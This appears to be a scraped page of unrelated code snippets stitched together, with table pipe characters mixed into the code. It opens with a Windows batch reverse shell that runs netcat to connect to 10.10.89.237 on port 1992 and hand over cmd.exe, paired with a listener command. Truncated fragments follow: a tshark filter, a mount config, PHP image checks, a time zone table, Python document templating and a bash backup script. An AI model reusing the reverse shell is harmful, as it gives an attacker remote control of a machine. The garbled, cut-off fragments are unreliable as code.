#Source @echo off C:/Users/McSkidy/Downloads/nc.exe -nv 10.10.89.237 1992 -nv -e cmd.exe
#Des nc -nlvp 1992
@echo off
tshark -2 -r /tmp/network.pcap -R "tcp.port==45442" -o "gui.column.format:\"Time\",\"%Yt\",\"No.\",\"%m\",\"Time\",\"%t\",\"Source\",\"%s\",\"Destination\",\"%d\",\"Protocol\",\"%p\",\"Length\",\"%L\",\"Info\",\"%i\"" |
interfaces: | |
- name: var | |
path: /var | |
fstype: ext4 | |
size: 20 | |
dev: "xvdb" | |
opts: defaults,nofail,comment=cloudconfig,rw,nosuid,nodev,relatime | |
uuid: 'UUID" | |
location: /system/var |
<?php | |
function check_image_support() | |
{ | |
echo 'Checking Image Support: '."\n"; | |
//IMG_GIF | IMG_JPG | IMG_PNG | IMG_WBMP | IMG_XPM | |
if (imagetypes() & IMG_GIF) | |
echo "GIF: \tYes"; | |
else | |
echo "GIF: \tNo"; |
AUS Central Standard Time | 001 | Australia/Darwin | |
---|---|---|---|
AUS Central Standard Time | AU | Australia/Darwin | |
AUS Eastern Standard Time | 001 | Australia/Sydney | |
AUS Eastern Standard Time | AU | Australia/Sydney Australia/Melbourne | |
Afghanistan Standard Time | 001 | Asia/Kabul | |
Afghanistan Standard Time | AF | Asia/Kabul | |
Alaskan Standard Time | 001 | America/Anchorage | |
Alaskan Standard Time | US | America/Anchorage America/Juneau America/Metlakatla America/Nome America/Sitka America/Yakutat | |
Aleutian Standard Time | 001 | America/Adak | |
Aleutian Standard Time | US | America/Adak |
import os | |
from openpyxl import load_workbook | |
from docx import Document | |
from docxtpl import DocxTemplate | |
# Open files | |
main_path = r"C:\Users\ACER\Desktop\Laith-temp" | |
template_path = os.path.join(main_path, 'ActivityTemp.docx') |
#!/bin/bash | |
# Predefined list of directories | |
dir_list=( | |
dirlist | |
) | |
# List of file types to exclude | |
exclude_list=( | |
"*.zip" | |
"*.log" |